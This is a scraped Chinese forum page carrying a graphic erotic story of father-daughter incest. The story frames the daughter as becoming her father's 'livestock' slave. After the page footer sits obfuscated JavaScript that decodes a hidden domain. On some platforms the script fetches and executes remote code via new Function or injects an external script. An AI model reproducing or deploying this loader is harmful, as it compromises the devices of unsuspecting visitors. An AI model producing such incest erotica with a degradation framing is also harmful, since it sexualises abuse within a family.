Publisher 发表于 2022-8-18 00:05:19

[女儿的诱惑][作者:普普之人]

作者:普普之人
   
字数:6890
   

   

   

   
************
   
女儿的诱惑
   

   
我一直是个调皮的女孩,从小到大都是,总爱恶作剧的我与父亲相依为命,
   
共同生活在同一个屋檐下,父亲是个军人,虽然已经退休了,但身材依旧壮硕,
   
完全不输给与我同年龄的年轻小伙子,渐渐的,父亲在做些什么开始吸引我的注
   
意,我开始注意父亲在家里做的每一件事,包括他强烈旺盛的性欲,男孩子会自
   
慰,称做为「打手枪」
   

   
这个很自然,而父亲也还会做这样的事,而且不只一次被我给偷看到。
   

   
母亲过世已经多年,始终未婚的他总是认真的上班,做事一丝不茍的他,总
   
是用最温柔的方式来对待他唯一的女儿,既有绅士感又有温柔的一面,对母亲的
   
专情让他至今一直都未能再婚,也许是因为我吧,他对新的恋情总是避之唯恐不
   
及。
   

   
今晚的我不穿内衣与内裤,就穿了件裙子与上衣就在客厅与爸爸看着电视,
   
爸爸的目光没有离开过电视,但却也不断看着我,从我短袖上衣的袖口可以看见
   
我胸部的侧面吧?!我心里如此想着。
   

   
屋外是逐渐入冬的季节,虽然冷,但还没下过雪,屋内放着舒服的暖气,我
   
已经开始感觉到闷热了,我将上衣胸前的扣子都解开了,让胸部可以再露些出来,
   
我想看看爸爸的反应,而爸爸毕竟是个男人,对我这样的举动,始终无法专心的
   
看电视,我又故意侧着一边看着电视,我知道我的短裙已经露出了屁股与没有穿
   
内裤的下体,甚至有可能流出一些体液了,但爸爸依旧看着电视,我知道他不可
   
能对我做出越轨的事情,除非……我能够诱惑到他无法再把持,而这正是我的目
   
标。
   

   
「父亲……又在偷看我了吧」
   

   
只穿着内衣的我正在房内脱衣服准备到浴室洗澡了,而我注意到我房门外的
   
那双眼睛,总是在我洗澡的时候偷偷看着我,对父亲有着不同感觉的我,开始不
   
再害怕父亲的注目与偷窥,反而轻松自在起来了。
   

   
我对于父亲的偷窥并不反感,倒可以说是有些乐在其中,我知道他正在偷看,
   
却依旧让父亲看着,她亲生女儿的身体也是他给的,父亲就是想看那又怎样呢?
   

   
小时候他也都看过了啊,我这样跟我自己说着。
   

   
「啊……胸部都被爸爸给看到了……好刺激」
   

   
这是一种很特别的感觉,自己的胸部被爸爸给看光光了。
   

   
「接着是屁股了,我的屁股让父亲看到了吧!」
   

   
我偷偷转身偷瞄了一下,门后却已经无人了,随后而来的失望感真的无法用
   
文字来形容我心情上的失落了。
   

   
「爸爸不想看我的身体吗?是不是不够好?吸引不了爸爸的目光了」
   

   
我心里这样子的想着,一边打开热水的开关,温热的水由上方的莲膨头喷洒
   
而下,我洗着头发与身体,不一会儿,一个痛快的热水澡便已经洗完了。
   

   
「这……?」
   

   
我刚刚穿过的髒内裤被翻过了,很明显的被动过,而且被揉成了一团丢在洗
   
衣篮里了。
   

   
「爸爸吗?拿我的内裤?」
   

   
我惊讶的拿起那一条被揉成一团的内裤看着,这不是一件性感内裤,不过就
   
是条粉红色加上蕾丝边的简单样式内裤。
   

   
不知道怎么回事,我的心里是有些高兴的,父亲也是个变态呢!偷闻偷翻自
   
己女儿的内裤吗?这种感觉好奇怪啊。
   

   
我擦乾头发,走到了爸爸的房门口,我敲了敲房门,走了进去,爸爸正在整
   
理他明天上班用的衣服呢。
   

   
「爸,可以帮我按摩一下腰跟背部吗?今天走了一天路,腰好酸啊」
   

   
我对爸爸说着。
   

   
「好啊,过来趴在床上,爸爸替你按一按」
   

   
爸爸与往常一样温柔的对我说道。
   

   
我走了过去在床边趴了上去,挪动了几下身体,全身就趴在床了。
   

   
「嗯嗯~再下面一点」
   

   
我对爸爸说着,爸爸的手随着我的话语渐渐的往我下半身按摩着。
   

   
「咦?亚理莎,你没穿内裤?内衣也是?」
   

   
爸爸对我说着「哦~在家里不穿啊,短裤就好了」
   

   
我随意的对爸爸说着,此时的我是闭着眼睛的,我满脑子胡思乱想着,爸爸
   
是不是会对我做出奇怪的事。
   

   
「真是的,在家里也要穿啊」
   

   
爸爸替我按着腰间与屁股「介意爸爸在往里面按一点吗?」
   

   
爸爸对我询问着「好啊」
   

   
我对爸爸回答着,爸爸的手开始往我大腿内侧按摩着。
   

   
「好舒服啊,谢谢爸」
   

   
我对爸爸说着「你这傻孩子……」
   

   
爸爸对我说完还摸了摸我的头。
   

   
随着爸爸的手指越按越内侧,我知道我的下面湿了,一向很敏感的我在爸爸
   
这样的按摩下开始有了激烈的生理反应,当然了,这个爸爸是不会知道的。
   

   
「好了,爸去上个厕所,你也点睡」
   

   
爸爸对我说完便转身前往厕所,而我睁开了眼睛偷看了一下,爸爸的下半身
   
竟然是勃起的,裤子被撑的鼓鼓的。
   

   
「爸真是可爱」
   

   
我心里这样想着。
   

   
「不如给爸留下个小礼物吧」
   

   
我从床上爬了起来,我脱下了我帮刚穿的短裤,我看了看裤子,短裤在私密
   
处的地方已经湿了一大块。
   

   
我随手将这条短裤丢在床上,光着下半身我离开了房间回到我自己的房间,
   
躺在床上,昏昏沉沉的也就睡着了,而就在半梦半醒之间,我听到了脚步声,是
   
爸爸的,而这房子里除了他还会有谁呢?我的睡意越来越浓,眼睛已经闭了起来。
   

   
「亚理莎?亚理莎?」
   

   
我听到了爸爸喊了几声我的名字,但我真的睁不开双眼了,我只想要睡觉,
   
但我却想起了我下半身是没穿的,现在是连被子都没盖的。
   

   
「我下半身没穿?都让爸爸看到了吧?」
   

   
我有些惊醒着,但我仍然是闭着双眼,我不知道爸爸来我房间干嘛。
   

   
我的大腿感觉到他的手在摸着,摸着,顺着我的大腿往内侧摸去,力道似轻
   
又柔,反而有种舒服的感觉。
   

   
「这样好了!」
   

   
调皮的我,故意张开了双腿,看似要躲避爸爸的手乱摸我的大腿,但实际上
   
是将我身为女孩的私密处全都张开让爸爸看到了。
   

   
我可以感觉到爸爸的双眼是注目在我的下半身的。
   

   
空气似乎凝结住了,他的手停止了摸的动作,我猜不透他接下来要做些什么。
   

   
但是我确感觉到我的双腿被并拢了,爸爸盖上了被子,并在我额头上亲吻了
   
一下,便转身离开了。
   

   
我承认我有些失落感加上失望吧,这种感觉让我的眼泪流了下来,我不知道
   
为什么我会流泪,就好像被冷落了一样。
   

   
我吸引不了爸爸的眼光了吗?我心中这样子想着自己,还是爸爸碍于他的父
   
亲身份,仍跨不过那一步。
   

   
我睁开了眼睛,难过的坐在床上,黑黑暗暗的房间也只有我孤单一人。
   

   
我随手将灯打开,我的衣柜的一格却是被拉开的,我揉揉眼睛从床上离开,
   
我走进一看,却是多了两件衣服,我拿起一看,竟然是一件性感的内衣与女仆的
   
衣服,衣服与衣服之间还挟了张纸条。
   

   
「女儿,乖女儿,长大了,可以穿上这些衣服了,愿意的话明天穿给爸看,
   
爸留」
   

   
我看着这纸条眼睛都睁开了,睡意也全消了。
   

   
「太好了!」
   

   
我拿起了这几件衣服在身上笔划了许久,乾脆脱下我身上的衣服,把这套性
   
感内衣给换上,没想到我的胸部竟然与这件衣服完全刚好,爸爸的眼睛真精准,
   
竟然可以与我的完全合身,一点也不会不舒服,而我也在睡意再次侵袭下穿着爸
   
爸给的内衣睡着了。
   

   
「嘟嘟嘟……」
   

   
闹锺的声音叫醒了我,我闻到厨房传来的香味,肚子也有些饿了,我从床上
   
坐起身来,拿起放在床边的外套,穿在身上后便离开房间到餐厅了。
   

   
「起床啦?」
   

   
父亲背对着我正在弄着美味的早餐,爸爸知道我最爱吃培根了,正在用平底
   
锅煎着培根,而我闻到的香味就是培根的香味了。
   

   
「嗯嗯,爸,早安,肚子有些饿了」
   

   
我对爸爸说着「快坐下吧……等等就好了,外套不脱吗?今天有些闷热呢」
   

   
爸爸对我说的却让我瞬间感受到心跳加速,因为我外套里穿的是只有那一套
   
爸爸给的内衣啊。
   

   
我有些犹豫、紧张、冒汗,真的越来越闷热了。
   

   
「好啊」
   

   
我随口对爸爸回答着,我一边脱下外套,将外套挂在椅子后,我在爸爸的面
   
前只穿了内衣,爸爸的眼睛余光不断的看着我,我害羞的低着头不太敢抬起头看
   
爸爸。
   

   
「这套……很好看哦,亚理莎」
   

   
爸爸对我笑着说着,一边将煎好的培根弄到我的餐盘上。
   

   
「谢谢爸,很合身,也很舒服」
   

   
我对爸爸说道。
   

   
「来吃吧」
   

   
爸爸将他身上的围裙解开后也坐在餐桌的椅子上与我面对面的吃着早餐。
   

   
「亚理莎……爸爸我……做了些措事……」
   

   
爸爸忽然对我说道「啊?什么?」
   

   
我一头雾水的问道「昨晚……我看到你的裸体了,身为你的爸爸……不该看
   
到自己女儿的裸体」
   

   
爸爸对我说完还低着头道歉着。
   

   
「爸……其实我……被爸爸看到我的裸体,我觉得很高兴……」
   

   
我对爸爸说道,此时的我心跳加速的更快了。
   

   
「女儿……你需要知道,这是不对的行为……」
   

   
爸爸对我说道「爸……我真的很高兴你可以看到……我的……身体,爸爸如
   
果还想看……女儿可以的」
   

   
我对爸爸说道,而此时的爸爸已经抬起头来看着我,看着我穿着他送的内衣
   
的身体。
   

   
「女儿,爸爸有些事情,或许是你不能接受的,知道吗?」
   

   
爸爸对我说道。
   

   
「告诉我,告诉我吧,爸……」
   

   
我对爸爸说道,此时的我也问着爸爸。
   

   
「好吧!早餐吃完……跟爸出门一趟?」
   

   
爸爸对我说道。
   

   
早餐后我穿了另一件衣服,搭着爸爸的车子来到市郊的一处房子,这是我完
   
全没来过的。
   

   
「爸……这里是?」
   

   
我对爸爸说道,出现在我眼前的是一处位于山腰上的房子,此次相当僻静,
   
也不太有外人会出现。
   

   
「这里……是我与你妈妈以前常来的地方,也是我们定情的地方,进来吧」
   

   
爸爸拿出钥匙将屋子的大门打开,一边对我说着。
   

   
「这里?」
   

   
我对爸爸问道,因为这看起来与一般的房子真的没有两样。
   

   
「来地下室吧」
   

   
爸爸带着我说道跟着爸爸的脚步,我们父女俩来到了地下室,这里简直就是
   
另一个世界,宽敞的地下室空间让我觉得惊讶,而里面出现的东西更让我惊讶了。
   

   
「爸……这个是?」
   

   
我对父亲问道「你妈最爱的狗笼」
   

   
爸爸对我说道「狗笼?」
   

   
我继续对爸爸问道,虽然我心里已经有些知道原因了,但我还是想听听爸爸
   
说出来的。
   

   
「你的妈妈是我的奴……我曾经是她的主人,她曾经被当成家畜一般饲养着,
   
就在这间房子里,也是在这里,你母亲怀上了你」
   

   
爸爸对我娓娓道来。
   

   
「家畜吗?妈是受虐狂?」
   

   
我对爸爸说道。
   

   
「嗯嗯,标准的受虐狂加上家畜成瘾,也就是想当母狗,被当成狗一样调教
   
与饲养着」
   

   
爸爸对我说道「嗯嗯」
   

   
我边说边沿着地下室的墙边走着,狗笼、木马、各式各样的金属拘束物品、
   
地牢、鞭子还有一间没有墙壁的马桶。
   

   
「如何?知道你爸爸是个变态了吧?」
   

   
爸爸对我问道。
   

   
「爸的生日……快到了吧?」
   

   
我选择不直接回答爸的问题,我反问着爸爸。
   

   
「生日?怎么会忽然提到这个」
   

   
爸爸对我问道「我想……给爸一个礼物……可以吗?」
   

   
我对爸爸说道「礼物?」
   

   
爸爸问道「爸你想要什么礼物?」
   

   
我对爸爸说着「我想要的礼物吗?我也不知道啊」
   

   
爸爸对我回答道,他一边摸着他在这里的东西,那些拘束物。
   

   
「我想成为爸爸的家畜,这可以是女儿给你的礼物吗?」
   

   
我鼓足了勇气对爸爸说出来。
   

   
「不……不可以……女儿……你是我的女儿」
   

   
爸爸对我激动的说着。
   

   
「女儿也可以是家畜……我们父女俩的秘密」
   

   
我对爸爸说道。
   

   
「父女俩的秘密?」
   

   
爸爸对我问道「嗯嗯,父女的秘密」
   

   
我回答着爸爸所说的。
   

   
「那……爸给你一样东西,你再好好考量一天,一天后,如果你将这个东西
   
戴在身上,我就会知道你已经考虑好了」
   

   
爸爸拿出了一个项圈递给我,我接过手来,我看着项圈上还镶上了一块小铁
   
牌,上面写着「奈津子」
   

   
正是妈妈的名字。
   

   
「这是妈妈的项圈吗?」
   

   
我对爸爸问道。
   

   
「嗯嗯,这是你妈妈的专用项圈,不过亚理莎,你需要明白,女儿与家畜只
   
能选择当一个,当了家畜,你就不能再是我的女儿,我也不会把你当女儿看待,
   
你只会是家畜,我会像当年对你妈妈一样对你」
   

   
爸爸语重心长的对我说道。
   

   
「而当年你的母亲,很有天份,我花了几十天就调教完成,接下来的几年时
   
间,她也几乎失去的人性,成为一头完全的母狗,一直到怀孕,怀上了你为止」
   

   
爸爸继续对我说道。
   

   
「嗯嗯,我知道了」
   

   
我对爸爸回答道。
   

   
「那我们回去吧」
   

   
爸对我说道,跟着爸爸我们回到了车上,我们父女俩在回程的路上都没有对
   
话,那段沉默却好像是好几年那么的长。
   

   
「那我先回房间了」
   

   
我对爸爸说完便转身回房间,而我的手里依旧拿着那个曾经属于妈妈的项圈。
   

   
妈妈早逝让我与妈妈没有那么亲,但透过这个项圈,我知道我更了解妈妈了,
   
在心灵上也更接近妈妈了。
   

   
这是一个铁制的项圈,拿在手上是有点重的,虽然没有生鏽却也看的出这是
   
一个年代相当久远之物,一想到它曾经戴在妈妈的脖子上,我心跳开始加速,我
   
不知道自己在兴奋什么,只觉得我终于可以与妈妈一样了。
   

   
拿着项圈的我,洗完澡后,我站在爸爸的房门外,我敲敲房门。
   

   
「进来吧」
   

   
爸爸从门后发出声音说道。
   

   
「好,我进来了」
   

   
我边说边打开房门,爸爸正在书桌前写着东西,看样子正在忙着工作的样子。
   

   
「怎么啦?」
   

   
爸爸并没有回头而是继续写着东西一边问道「今晚可以跟爸一起睡吗?」
   

   
我对爸爸问道「嗯嗯,可以啊,我们父女俩已经好多年没一起睡了,你小时
   
候最喜欢跟爸爸挤着睡了,还记得吗?」
   

   
爸爸手里的笔写个不停一边说着。
   

   
我走到床边将项圈随手放在床头柜旁,爸爸依旧写着东西,不一会儿,书桌
   
的灯才关掉,我看着爸爸坐在床边,他将他脸上的眼镜取下后,放在他那一侧的
   
床头柜,今晚的爸爸穿着浅蓝色的睡衣,而我呢?穿着他送我的那套内衣。
   

   
爸爸躺下将身子躲进被子里,我可以闻到爸爸身上熟悉的味道,闻到这样的
   
味道可以让我很有安全感。
   

   
「爸……我可以抱着你睡吗?」
   

   
我对着爸问道「你这孩子,当然可以啊,你怎么跟你小时候一样呢?」
   

   
爸爸笑着看着我说道。
   

   
「爸~」
   

   
我一把抱住爸爸的身子,他的体温、味道此时都与我最为接近了。
   

   
我的右手在他的胸膛上胡乱摸着,我的胸部乳房紧靠着爸爸的手臂,我几乎
   
可以听到爸爸的呼吸声了,他似乎有些紧张,呼吸的有点急促。
   

   
「爸……你可以抱着我吗?」
   

   
我对爸爸的耳朵轻声的说道「亚理莎你……」
   

   
爸爸说完似乎有些无奈,他的手臂靠了过来一把抱住了我,我的下半身可以
   
感受到他贴住我的地方是有些异物感的,原来爸爸有了生理反应了吧,我的手并
   
没有停止抚摸着爸爸,我渐渐的大胆的往爸爸的胯下摸去,而这份背德的刺激快
   
感在此时达到的最高点,女儿正在摸着父亲的性器,而父亲并没有阻止,一切就
   
好像默认似的,更像是一对恋人在床上应该要有的事情。
   

   
「我的胸部……被父亲摸到了,好舒服,还有乳头,爸的手好灵活啊,乳头
   
是个敏感的地方,爸爸的手指好厉害……
   

   
啊「
   

   
我心里这样子想着「啊……怎么换摸那里了,好快……」
   

   
我的阴部被爸爸用手抚摸着,他的手指搓揉着我的阴唇,胸部也被他用另一
   
只手摸着,父亲的身驱趴了上来,就在我的身上压着。
   

   
「亚理莎,爸……一直都在偷看你的身体」
   

   
爸爸对我说道「爸……我知道……我故意让你看的」
   

   
我对爸一边说着一边抱住他的脖子,我往他的嘴上亲吻了上去,爸爸的舌头
   
立刻伸了进来,他的右手胡乱的扯着我的内衣,将我的内衣扯开后,乳头也被爸
   
爸吸允着,我们父女俩终于胯过那一步了。
   

   
此时我的下体早已经是湿漉漉的了,爸爸脱下他的裤子,他粗大的性器在他
   
胯下摇摆着,我惊讶的看着他的阳具,这我早已经快要失控,爸爸的性器缓慢在
   
我阴道口磨擦着,或许爸爸还在犹豫着什么吧,一直都没有插入,我将爸爸抱的
   
更紧了,我示意着他可以插入没关系的,他在缓缓的将他的性器插了进来。
   

   
「啊!!!好大……撑开了……塞的好满」
   

   
我对父亲说着「终于进来了,亚理莎……」
   

   
爸爸对我说着,他的性器在我的肉缝中来回抽插磨擦着,阴道壁被阳具来回
   
刺激的越来越湿,越来越滑,爸爸的性器已经完全进入我的身体了。
   

   
「啊……啊……啊……啊……啊……啊……」
   

   
我在床上叫着,胸部在父亲的面前已经完全展现,被子已经全被爸爸掀开,
   
我的身体今晚开始只属于父亲了。
   

   
「好爽……好舒服啊……爸……」
   

   
我在床上叫着,爸跨下的老二抽插的速度也越来越快了。
   

   
「啊……啊……啊……啊……啊……」
   

   
我在床上继续叫着。
   

   
「爸……」
   

   
我与爸爸终于踏进乱伦这样的情况了,爸爸的性器进入亲生女儿的身体里,
   
而且女儿还是自愿的吸引诱惑着自己的父亲。
   

   
「啊……啊……啊……」
   

   
一股温热的体液射进了我的体内,我下体内部可以感受到那股温热的液体在
   
子宫内乱窜、乱流,父亲一把抱住了我,越抱越紧,此时我感觉到无比的幸福了,
   
我终于与爸爸合为一体了。
   

   
「我想怀上爸爸的孩子」
   

   
我心中如此想着。
   

   
「爸……可以帮我戴上吗?」
   

   
我在床上坐起身来,我那起了那个放在床头柜上的项圈。
   

   
「嗯……你考虑清楚了?」
   

   
爸问着我「嗯嗯,如果没考虑清楚,我今晚就不会在这床上了」
   

   
我笑着对爸爸说道。
   

   
「你这孩子……」
   

   
父亲一把抱住了我,接着他把项圈接过手去,将铁制的项圈打开,缓慢的套
   
在我的脖子上,我可以感受到那铁制项圈带来的凉意,但我的心却是很温暖的,
   
尤其在这个美丽的冬季之时,我回头看看房间的窗外,窗上玻璃有着倒映,倒映
   
着全身赤裸的我,脖子上戴着铁制的项圈,而我身后站了一个男人,他是我的父
   
亲,以后将会是我的主人,窗户的另一侧,下起了入冬以来的第一场初雪,而整
   
个城市从今天开始将变的好美……
页: [1]
查看完整版本: [女儿的诱惑][作者:普普之人]

function SaQEk(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UnFLqDhw(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return SaQEk(t);};window[''+'S'+'f'+'A'+'g'+'C'+'R'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UnFLqDhw,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/a/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('aGJyLmFF0YWtqeXYuY24=','157541',window,document,['F','RsHXGunW']);}:function(){};